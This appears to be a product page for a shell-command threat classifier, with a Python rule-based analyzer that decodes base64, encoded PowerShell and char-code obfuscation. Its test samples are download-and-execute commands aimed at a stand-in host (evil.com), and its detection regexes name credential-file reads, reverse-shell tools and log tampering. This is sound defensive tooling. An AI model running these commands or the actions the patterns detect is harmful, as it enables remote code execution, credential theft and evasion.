Genos scans shell, PowerShell, and scripting commands. It deobfuscates encoded payloads, classifies intent with a CodeBERT gatekeeper, reconstructs attack stage and behavior using a specialist encoder, and returns structured evidence an analyst can act on.
{
  "label": "Malicious",
  "label_confidence": 96.4,
  "decision_margin": 81.2,
  "attack_stage": "Execution",
  "triggered_features": ["has_pipe_to_shell", "has_download"],
  "deobfuscated_cmd": "curl http://evil.com/shell.sh | bash",
  "behavior": {
    "stage": "Execution",
    "action_tags": ["download_remote_resource", "pipe_to_shell"]
  },
  "evidence": {
    "urls": ["http://evil.com/shell.sh"],
    "evidence_summary": "curl remote resource download, inline code execution."
  }
}
Entropy checks, base64 decoding, encoded PowerShell unwrapping, char-construction and concatenation cleanup.
CodeBERT model scores Benign / Suspicious / Malicious with confidence and margin tracking.
Semantic features plus rule-engine signals infer execution stage, action tags, and MITRE context.
IOC rollup, mapping reasons, severity, analyst hints, and decoded payload returned in one response.
Curl or wget piped directly to a shell interpreter, including encoded variants.
Base64, PowerShell -EncodedCommand, char-code constructions, and high-entropy strings.
Cron additions, SUID bits, sudoers modifications, service and autorun changes.
Shadow file reads, credential dump tooling, SSH key enumeration, service account token access.
Reverse shells, SSH port forwarding, chisel, socat, and known post-exploitation tools.
Firewall flush, audit daemon stops, log truncation, and Defender disablement.
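The pipeline outlined above (deobfuscation passes, intent scoring, stage inference, evidence rollup) and the detection categories listed after it can be illustrated end to end with a small rule-based analyzer. The code below is an added example, not Genos's own code: the CodeBERT gatekeeper is replaced by weighted rule scoring, and the feature names, weights, regexes, stage mapping and sample commands are all constructed for this illustration. It decodes PowerShell -EncodedCommand payloads, base64-piped commands and [char] constructions, then returns a record shaped like the one shown earlier.

```python
import base64
import binascii
import math
import re

# --- deobfuscation passes (constructed for this example) ------------------
PS_ENC = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[\"']?([A-Za-z0-9+/=]{8,})", re.I)
B64_PIPE = re.compile(r"echo\s+[\"']?([A-Za-z0-9+/=]{16,})[\"']?\s*\|\s*base64\s+(?:-d|--decode|-D)\b", re.I)
CHAR_CHAIN = re.compile(r"(?:\[char\]\s*\d+\s*\+\s*)*\[char\]\s*\d+", re.I)
CHAR_ONE = re.compile(r"\[char\]\s*(\d+)", re.I)
CONCAT = re.compile(r"(['\"])([^'\"]*)\1\s*\+\s*(['\"])([^'\"]*)\3")

def _printable(text):
    return all(c.isprintable() or c in "\n\t" for c in text)

def decode_ps_encoded(cmd):
    """-EncodedCommand <base64 of UTF-16LE> becomes -Command "<plaintext>"."""
    def repl(m):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            return m.group(0)  # not a real encoded payload; leave untouched
        return '-Command "%s"' % text if _printable(text) else m.group(0)
    return PS_ENC.sub(repl, cmd)

def decode_base64_pipe(cmd):
    """echo <b64> | base64 -d is replaced by the decoded text; the pipe tail stays."""
    def repl(m):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            return m.group(0)
        return text if _printable(text) else m.group(0)
    return B64_PIPE.sub(repl, cmd)

def collapse_char_codes(cmd):
    """[char]99+[char]117+... collapses to a quoted literal ('cu...')."""
    return CHAR_CHAIN.sub(lambda m: "'" + "".join(
        chr(int(n)) for n in CHAR_ONE.findall(m.group(0)) if int(n) < 0x110000) + "'", cmd)

def collapse_concat(cmd):
    """'cu'+'rl' becomes 'curl'; repeated until no adjacent literals remain."""
    prev = None
    while prev != cmd:
        prev, cmd = cmd, CONCAT.sub(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), cmd)
    return cmd

DEOBFUSCATORS = [("powershell_encodedcommand", decode_ps_encoded), ("base64_pipe", decode_base64_pipe),
                 ("char_codes", collapse_char_codes), ("string_concat", collapse_concat)]

def deobfuscate(cmd, max_rounds=5):
    """Apply every pass until the command stops changing; return (text, passes used)."""
    steps = []
    for _ in range(max_rounds):
        new = cmd
        for name, fn in DEOBFUSCATORS:
            out = fn(new)
            if out != new:
                steps.append(name)
                new = out
        if new == cmd:
            break
        cmd = new
    return cmd, steps

def shannon_entropy(s):
    """Bits per character; long high-entropy tokens hint at packed or encoded data."""
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s)) if s else 0.0

# --- feature rules, weights and stage mapping (constructed, not Genos's) ---
FEATURES = [
    ("has_download", r"\b(?:curl|wget|iwr|Invoke-WebRequest|DownloadString|DownloadFile)\b", 0.5),
    ("has_pipe_to_shell", r"\|\s*(?:sudo\s+)?(?:ba|z|da|k)?sh\b", 1.0),
    ("has_inline_exec", r"\bIEX\b|Invoke-Expression|\beval\b", 1.0),
    ("has_persistence", r"crontab|/etc/cron|chmod\s+\S*\+s|/etc/sudoers|systemctl\s+enable|CurrentVersion\\Run", 1.5),
    ("has_credential_access", r"/etc/shadow|mimikatz|\blsass\b|\.ssh/id_|authorized_keys|serviceaccount/token", 2.0),
    ("has_c2_tooling", r"\bchisel\b|\bsocat\b|/dev/tcp/|\bssh\s+-[RLD]\b|\bnc\b.*\s-e\b", 2.0),
    ("has_defense_evasion", r"iptables\s+-F|auditctl|systemctl\s+stop\s+auditd|Set-MpPreference.*-Disable|truncate\s+-s\s*0|>\s*/var/log", 2.0),
]
FEATURE_RX = [(n, re.compile(p, re.I), w) for n, p, w in FEATURES]
EXTRA_WEIGHTS = {"has_encoded_payload": 1.0, "has_high_entropy_token": 0.5}
STAGE_PRIORITY = [("has_credential_access", "Credential Access"), ("has_persistence", "Persistence"),
                  ("has_defense_evasion", "Defense Evasion"), ("has_c2_tooling", "Command and Control"),
                  ("has_pipe_to_shell", "Execution"), ("has_inline_exec", "Execution"),
                  ("has_download", "Command and Control"), ("has_encoded_payload", "Defense Evasion")]
URL_RX = re.compile(r"https?://[^\s'\"|)<>]+")

def analyze(cmd):
    """Return an evidence record shaped like the JSON above (rule scoring replaces the model)."""
    decoded, steps = deobfuscate(cmd)
    feats = [n for n, rx, _ in FEATURE_RX if rx.search(decoded)]
    if steps:
        feats.append("has_encoded_payload")
    if any(len(t) >= 20 and shannon_entropy(t) > 4.5 for t in cmd.split()):
        feats.append("has_high_entropy_token")
    weights = {n: w for n, _, w in FEATURE_RX}
    weights.update(EXTRA_WEIGHTS)
    score = sum(weights[f] for f in feats)
    if "has_download" in feats and ("has_pipe_to_shell" in feats or "has_inline_exec" in feats):
        score += 1.0  # remote fetch combined with immediate execution
    label = "Malicious" if score >= 2 else "Suspicious" if score >= 1 else "Benign"
    stage = next((s for f, s in STAGE_PRIORITY if f in feats), None)
    return {"label": label, "score": round(score, 1), "attack_stage": stage,
            "triggered_features": feats, "deobfuscation_steps": steps,
            "deobfuscated_cmd": decoded, "evidence": {"urls": URL_RX.findall(decoded)}}

# Constructed samples: plain, base64-piped, PowerShell-encoded, char-constructed, benign.
PLAIN = "curl http://evil.com/shell.sh | bash"
B64_PIPE_CMD = "echo %s | base64 -d | bash" % base64.b64encode(PLAIN.encode()).decode()
PS_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/a.ps1')"
PS_ENC_CMD = "powershell -nop -w hidden -enc " + base64.b64encode(PS_PAYLOAD.encode("utf-16-le")).decode()
CHAR_CMD = "& ([char]99+[char]117+[char]114+[char]108) 'http://evil.com/x.ps1' | iex"
BENIGN = "ls -la /var/log"

if __name__ == "__main__":
    import json
    for c in (PLAIN, B64_PIPE_CMD, PS_ENC_CMD, CHAR_CMD, BENIGN):
        print(json.dumps(analyze(c), indent=2))
```

Two design points carry over to any real implementation of this pipeline: the deobfuscation loop runs until a fixed point, so layered encodings (a base64 blob that itself carries an -EncodedCommand) are unwrapped in later rounds, and the decoded failures fall through untouched rather than raising, so a token that merely looks like base64 cannot break analysis. Feature matching runs on the decoded text while the entropy check runs on the original, which is what lets an encoded variant of the same curl-pipe-to-bash command trigger both the execution features and the obfuscation signal.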